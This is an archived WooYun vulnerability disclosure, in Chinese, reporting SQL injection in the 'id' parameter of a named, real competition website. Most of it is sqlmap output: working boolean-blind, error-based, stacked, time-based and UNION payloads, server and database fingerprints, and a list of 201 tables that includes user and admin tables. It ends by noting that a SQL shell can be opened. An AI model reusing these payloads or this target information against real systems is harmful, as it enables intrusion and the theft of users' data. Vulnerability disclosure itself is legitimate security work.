乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-11: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-26: 厂商已经主动忽略漏洞,细节向公众公开
全民竞赛网是为政府、企事业单位、学校向公众提供宣传和普及知识的网上竞赛平台。
1.全民竞赛网存在sql注入,注入点:http://www.chinese-js.com/NewsDetail.aspx?id=1051922.sqlmap验证:
sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=105192 AND 3822=3822 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=105192 AND 2609=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2609=2609) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(106)+CHAR(113))) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3735=3735) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(106)+CHAR(113)) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: id=105192;WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=105192 WAITFOR DELAY '0:0:5' Type: UNION query Title: Generic UNION query (NULL) - 18 columns Payload: id=105192 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)+CHAR(109)+CHAR(106)+CHAR(72)+CHAR(121)+CHAR(121)+CHAR(104)+CHAR(89)+CHAR(68)+CHAR(97)+CHAR(108)+CHAR(77)+CHAR(111)+CHAR(71)+CHAR(109)+CHAR(121)+CHAR(70)+CHAR(80)+CHAR(77)+CHAR(115)+CHAR(102)+CHAR(100)+CHAR(116)+CHAR(75)+CHAR(119)+CHAR(72)+CHAR(67)+CHAR(109)+CHAR(122)+CHAR(99)+CHAR(116)+CHAR(117)+CHAR(102)+CHAR(117)+CHAR(102)+CHAR(106)+CHAR(84)+CHAR(122)+CHAR(104)+CHAR(108)+CHAR(109)+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----[21:53:50] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005
3.跑出8个数据库
4.当前数据库为:123js,跑出201个表
Database: 123js [201 tables]+-------------------------------------+| City || CloudService || Competition_temp || LinkCN1 || LinkCN1 || Picture || Province || View_BranchScore || View_Competition_Users || View_Question || View_tblAdUser || View_tblAddMoneyRecord || View_tblArticle || View_tblCompPrice || View_tblCompPrjEvaluation || View_tblCompPrjUserComment || View_tblCompProject || View_tblCompType2 || View_tblCompType3 || View_tblCreateCompRecord || View_tblDS_Branch || View_tblDS_Competition || View_tblDS_TestStock || View_tblDS_UserExamResult || View_tblDS_Users || View_tblDataDownload || View_tblMember || View_tblOrder || View_tblResearchRecord || View_tblSetMealOrder || View_tblShareExperience || View_tblSuccessfulCase_New || View_tblSuccessfulCase_New || View_tblSysUser || View_tblWeinxin_Huodong || View_tblWeinxin_PrizeUser || View_tblWeixin_DatiDetail || View_tblWeixin_Users || View_tblWenda || ceshi || comd_list || t_jiaozhu || tata || tblAboutUs || tblAdUser || tblAddMoneyRecord || tblArea || tblArticle1 || tblArticle1 || tblArticleHistory || tblArticleRemark || tblArticleRemarkReport || tblArticleType || tblAskForAgent || tblBlackList_IP || tblBlackList_OpenId || tblBranchCode || tblCarbonFootprint || tblCardNo || tblCityIP || tblCommendAreaInfo || tblCommendAreaInfo || tblCommendNews || tblCompMode || tblCompPrice || tblCompPrjEvaluation || tblCompPrjUserComment || tblCompProject || tblCompSetMeal || tblCompType1 || tblCompType1 || tblCompType2 || tblCompType3 || tblCompUserGroup || tblCounty || tblCreateCompRecord || tblDP_CommentProd || tblDP_Company || tblDP_ProdType1 || tblDP_ProdType2 || tblDP_ProductInfo || tblDS_Advice || tblDS_Age || tblDS_Area || tblDS_Baoming || tblDS_Branch || tblDS_CommendBBS || tblDS_CommendInfo || tblDS_CompSolution || tblDS_CompetitionAd_Temp || tblDS_CompetitionAd_Temp || tblDS_CompetitionAd_Temp || tblDS_CompetitionPoint || tblDS_CompetitionQuestion || tblDS_CompetitionType || tblDS_Identity || tblDS_Industry || tblDS_JiYu || tblDS_Log || tblDS_Neighborhood || tblDS_Pic || tblDS_PrizeBill_Branch || tblDS_PrizeBill_Person || tblDS_Street || tblDS_TestStockDesc || tblDS_TestStockModel || tblDS_TestStock_temp || tblDS_TestStock_temp || tblDS_UserExamResult_Temp || tblDS_UserExamResult_Temp || tblDS_Users_Temp || tblDS_Users_sj_full1 || tblDS_Users_sj_full1 || tblDS_Work || tblDataDownload || tblDataDownloadType || tblDirect || tblFPN_Mutuality || tblFriendLink || tblFrontPageNews || tblFrontPageNewsType || tblGetNewsLOG || tblGrade || tblHomeCommend1 || tblHomeCommend1 || tblHotNews || tblKeyWords || tblLeaveWord || tblLoginLog || tblMember_temp || tblMember_temp || tblMobile_TestStockScore1 || tblMode || tblNewsSource1 || tblNewsSource1 || tblObjective || tblOrder || tblPhotoVoteActiveLeaveWord || tblPhotoVoteActiveLeaveWord || tblPhotoVoteDetail || tblPhotoVoteInfo || tblPhotoVote_PrizeItem || tblPhotoVote_PrizeUser || tblPicNews || tblPicNewsType || tblProductInfo || tblResearchDetail || tblResearchDetail || tblResearchRecord || tblRight || tblRole || tblRoleRight || tblSetMealOrder || tblShareExperience || tblSite || tblSpecial_Xihui || tblSpiderSource || tblSuccessfulCaseType || tblSuccessfulCase_New || tblSuccessfulCase_New || tblSunVoteComp || tblSunVoteComp || tblSunVoteTestStock || tblSunVoteUserExamResult || tblSunVoteUsers || tblSysUser || tblTempComp || tblTestRandom || tblTestRandomType_8 || tblTestRandomType_8 || tblUnionids || tblUserWorks || tblUsers || tblVisitRecord_cut || tblVisitRecord_cut || tblVoteActive || tblVoteDetail || tblVoteInfo || tblVoteItem不用 || tblVote不用 || tblWeinxin_HuodongMode || tblWeinxin_HuodongMode || tblWeinxin_HuodongPlan || tblWeinxin_PrizeItem || tblWeinxin_PrizeUser || tblWeinxin_RedPacketTotalDetailPlan || tblWeinxin_RedPacketTotalDetailPlan || tblWeinxin_RedPacketUser || tblWeixin_DatiDetail || tblWeixin_DatiDetail || tblWeixin_Shiti || tblWeixin_Users || tblWenda || tblWendaType || tblWhiteList_IP || tblWhiteList_OpenId || tblWorksMessageBoard || tblWorksNotice || tet || xx || 查询 |+-------------------------------------+
4.可用--sql-shell 写入sql shell进行数据库操作
如上。
防注入
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)